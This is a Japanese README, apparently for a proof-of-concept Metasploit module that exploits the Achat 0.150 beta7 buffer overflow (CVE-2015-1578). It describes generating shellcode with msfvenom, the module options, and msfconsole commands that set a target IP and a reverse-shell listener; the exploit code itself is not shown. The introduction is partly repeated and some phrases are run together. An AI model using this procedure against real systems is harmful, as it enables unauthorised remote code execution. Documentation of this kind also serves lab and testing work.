これは、CVE-2015-1578(Windows上のAchat 0.150 beta7におけるバッファオーバーフローの脆弱性)を対象とした、概念実証(proof-of-concept)のMetasploitモジュールエクスプロイトです。この悪用により、細工されたUDPパケットを介してリモートコード実行が可能になります。
これは、Windows 上の Achat 0.150 beta7 におけるバッファオーバーフローの脆弱性 CVE-2015-1578 に対する Metasploit モジュールです。悪用により、巧妙に細工された UDP パケットを介してリモートコード実行が可能になります。
このモジュールは、Metasploit エクスプロイト開発の、クリーンで最小限かつ構造の整った例として設計されています。以下を示しています。
msfvenom による動的な Unicode エンコード済みシェルコード生成$PATH 内の msfvenommsfvenom を使用して、x86/unicode_mixed エンコーディングとカスタム bad characters を持つペイロードを生成します./install.sh
次に Metasploit を起動して、以下を実行します:
reload_all
use exploit/windows/yaldobaoth/achat_bof
オプション
RHOSTS – ターゲットの IP アドレス(必須)LHOST – リバースシェル用のローカルホスト IP(必須)LPORT – リバースシェル用のローカルポート(デフォルト: 4444)RPORT – ターゲット上のリモート UDP ポート(デフォルト: 9256)使用例
msfconsole
use exploit/windows/yaldobaoth/achat_bof
set RHOSTS 10.10.10.74
set LHOST 10.10.16.7
set LPORT 9393
run
これにより、次のことが行われます:
LHOST:LPORT でシェルを待ち受けます